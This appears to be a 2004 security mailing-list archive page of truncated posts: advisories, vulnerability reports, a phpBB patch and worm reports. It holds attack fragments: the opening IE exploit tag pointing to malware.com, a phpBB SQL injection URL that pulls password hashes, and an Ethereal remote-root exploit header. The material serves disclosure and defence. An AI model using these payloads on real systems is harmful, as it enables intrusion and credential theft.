<!--

GET / HTTP/1.1
HTTP/1.1 200 OK
Server: My Bitchin' IE Infector
Date: Sat Mar 27 13:22:27 2004
Content-type: text/html
Accept-Encoding: identity
Accept-ranges: bytes

<<snip content>>

-->

<<reinsert content>>

<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com

[ more ]  [ reply ]

Executive Overview
------------------
Cloisterblog, a general usage web blog written in perl suffers
from multiple XSS and directory transversal issues as well as a design flaw in the admin section.

Program Description
--------------------
Cloisterblog
(http://www.circleofthunder.com/journal/c

[ more ]  [ reply ]

Hi guys,

After playing around with the private message SQL injection issue on a forum that I admin I noticed that the exploit code posted in the authors post doesn't work correctly. Here is why:

Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is each f

[ more ]  [ reply ]

Vendor : All Enthusiast, Inc.

URL : http://www.photopost.com

Version : PhotoPost PHP Pro 4.6.x && Earlier

Risk : Multiple Vulnerabilities

Description:

PhotoPost was designed to help you give your users exactly what they

want. Your users will be thrilled to finally be able to u

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200403-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
~

[ more ]  [ reply ]

Hey, everyone.

it is exploit "Internet Security Systems PAM ICQ Server Response Processing Vulnerability"
which found by eeye. based witty worm. :)

http://www.eeye.com/html/Research/Advisories/AD20040318.html

Cheers,

Sam Chen <Sam (at) 0x557 (dot) org [email concealed]>

[ more ]  [ reply ]

/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
* Ethereal IGAP Dissector Message Overflow Remote Root exploit
*
* Copyright 2004 - EOS-India Group
*
* Authors note:
* Shellcode splitting technique:
* Due to difficulty involved while following normal exploitation techniques due to shortag

[ more ]  [ reply ]

In-Reply-To: <20040326193014.24220.qmail (at) www.securityfocus (dot) com [email concealed]>

It works but only display 25 chars of the MD5, to display the last 7 chars just do :

privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_
type=-99%20UNION%20SELECT%20username,null,right%28user_password,7%29,nul
l,n

[ more ]  [ reply ]

systrace silently patches full local bypass vulnerability on Linux

Introductory Note:

I will not be replying to any posts in response to this mail, no
matter how many times you intentionally misspell my name or
attack me personally. Annoying me in an attempt to get me
to release vulnerabili

[ more ]  [ reply ]

Word of warning-- on my machines, this update (3.6cch) changed my previous
config by enabling auto-blocking and changing settings to Paranoid (block
all inbound). On a busy server, it didn't take long for users to start
screaming loudly when they suddenly could not connect.

ISS is real vague with

[ more ]  [ reply ]

Hi,

I think it's a new worm spreading on undernet. The worm PRIVMSG user
with an ip address and port like this (ip and port never change) :
[07:53] <C96347981> http://69.157.174.169:2233/

If you telnet to this address, you'll get

C:\telnet 69.157.174.169 2233
GET / HTTP/1.1
HTTP/1.1 200 O

[ more ]  [ reply ]

it seems that a new problem was discovered in the default config of many versions of BlackICE and RealSecure...

Whats' new (26 Mar 2004) : Updated to correct a misconfiguration in the default settings that changed the default blocking and reporting behavior and may affect the level of protectio

[ more ]  [ reply ]

Everyone, over the past 4 days I have been observing very random outgoing
connection requests to a single external machine on the inet over ports 3127
and 3198.

The three machines in question are running Windows 2000 Server with all
security fixes and current Symantec anti-virus definitions. Th

[ more ]  [ reply ]

Introduction:

Bblog, a blogging system scripted in PHP does not perform sufficient filtering when submitting a blog name. The severity of this flaw however, is low as the required privileges to access the administration panel for bblog is superuser.

The problem:

The flaw lies in bblog/index.p

[ more ]  [ reply ]

In-Reply-To: <20040326172740.5558.qmail (at) www.securityfocus (dot) com [email concealed]>

Nice find,

Confirmed on phpBB 2.0.8 :) What I did as a quick fix was to declare $pm_sql_user empty before it is declared with the proper data. That way it (hopefully) will not pass any values recieved from outside of the script to t

[ more ]  [ reply ]

----------------------------------------------------------------------

Rstack Team (Rstack.org) --- Security Advisory

Advisory Number: RSTACK-20040325

Subject: Nstxd remote DoS-Bug (NULL-pointer-dereference)

Author: Laurent Oudot <oudot (at) rstack (dot) org [email concealed]>

Discovered: ...

Publi

[ more ]  [ reply ]

Freshmeat Comment Filtering Error
---------------------------------

Freshmeat is a community driven website which serves as an index
of free software projects.

Each of the listed projects contains links to a website, download
locations and other relevent information.

The site is updat

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

************************************************************************
************
Netwosix Linux Security Advisory #2004-0006 <http://www.netwosix.org>
- ------------------------------------------------------------------------
-----------

Package nam

[ more ]  [ reply ]

> -----Original Message-----
> From: Jeff Uslan [mailto:jeff_uslan (at) speakeasy (dot) net [email concealed]]
> Sent: Friday, March 26, 2004 10:49 AM
> To: jeff_uslan (at) speakeasy (dot) net [email concealed]
> Subject: MS Outlook/Outlook Express Preview Pane Security Issue
>
>
> FYI
>
>
> Just a reminder that if you are using anything but Outlo

[ more ]  [ reply ]

Hey,

The below patch fixes the sql injection vulnerability
reported by Janek Vind "waraxe", in privmsg.php.

--
--- privmsg.php 2004-03-18 19:51:32.000000000 +0000
+++ privmsg.1.php 2004-03-26 19:51:07.000000000
+0000
@@ -212,7 +212,17 @@
break;
case 's

[ more ]  [ reply ]

FYI

Just a reminder that if you are using anything but Outlook 2003. The HTML
injection issues and other such exploits with just viewing the preview pane
have mostly been taken care of in the older versions but issues are still
popping up. If you want to use the preview pane I would recommend

[ more ]  [ reply ]

So, if I patch, then I cannot bypass the password mechanisms. But if I do
not patch, then I still can... Or does a patched application allow for the
creation of a document in which the security controls cannot be bypassed
using an unpatched MS Word? Can a document from an unpatched application
s

[ more ]  [ reply ]

------------------------------------------------------
BLOGGER XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent User Account
Hijacking)

--------------------------------

[ more ]  [ reply ]

{=======================================================================
=========}

{ [waraxe-2004-SA#013] }

{=======================================================================
=========}

{

[ more ]  [ reply ]

{=======================================================================
=========}

{ [waraxe-2004-SA#012] }

{=======================================================================
=========}

{

[ more ]  [ reply ]

During a nessus-scan with DoS-attacks enabled I was able to bring down the
Tomcat server (version 5.0.14 running on Windows 2003). After reading the
report and doing some research I learned this should be a vulnerability prior
to version 4.1.10.

Vulnerability:
http://cert.uni-stuttgart.de/archiv

[ more ]  [ reply ]

To the moderator, this is my first bugtraq posting, feel free to make any
changes you feel nessessary to make this more helpful. Thank you very much

Vendor : NetSupport
URL : http://www.netsupport-inc.com/
Version : Invision NetSupport School Pro
Risk : Password protection weakness

Descri

[ more ]  [ reply ]